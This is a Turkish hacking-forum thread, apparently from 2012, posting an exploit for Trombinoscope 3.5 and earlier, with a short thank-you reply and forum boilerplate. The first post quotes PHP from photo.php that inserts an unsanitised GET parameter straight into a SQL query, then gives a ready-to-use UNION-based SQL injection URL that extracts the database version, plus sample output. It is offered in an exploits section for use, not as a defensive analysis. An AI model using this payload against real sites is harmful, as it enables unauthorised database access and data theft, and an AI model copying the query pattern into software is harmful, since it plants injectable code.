Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Exploitler > Bug Researchers

Bug Researchers Yeni bulunan açıklar.



Trombinoscope <= 3.5 SQL Injection Vulnerability

Bug Researchers

Yeni Konu aç Cevapla
 
Seçenekler
Alt 06-05-2012 20:44   #1
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
09/2010
Mesajlar
Konular

Teşekkür (Etti): 3
Teşekkür (Aldı): 2


Cool Trombinoscope <= 3.5 SQL Injection Vulnerability



<~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~ ><~><~><~><~>
Exploit Title: Trombinoscope <= 3.5 SQL Injection Vulnerability
Date: 03 Mayıs 2012
Author: THT
Home: Turkhackteam.net
Program:
http://ftp1.toocharger.com/sc2MP3p/t...scope_4116.zip
<~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~ ><~><~><~><~>

Bugs <photo.php>:

[...]
25 <?php
26 $id = $_GET["id"];
27
28 $query_seul = "SELECT `pseudo`, `sexe`, `img` FROM `trombino` WHERE idx = $id";
29 $seul = mysql_query($query_seul) or die(mysql_error());
30 $row_seul = mysql_fetch_assoc($seul);
31
32 ?>
[...]

Exploit: http://localhost/[script]/photo.php?id=-9999/**/union/**/select/**/1,2,version()--
Sonuç : 5.0.51b-community-nt-log



___________________________________________

NE MUTLU TÜRKÜM DİYENE

 Offline  
 
Alıntı ile Cevapla
Alt 19-06-2013 21:13   #2
  • Binbaşı
  • Üye Bilgileri
Üyelik tarihi
07/2012
Nereden
İstanbul
Mesajlar
Konular

Teşekkür (Etti): 296
Teşekkür (Aldı): 137




teşekkür ederim kardeşim bunu aramıştım ama nedense bulamadım tesadüf burda buldum
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau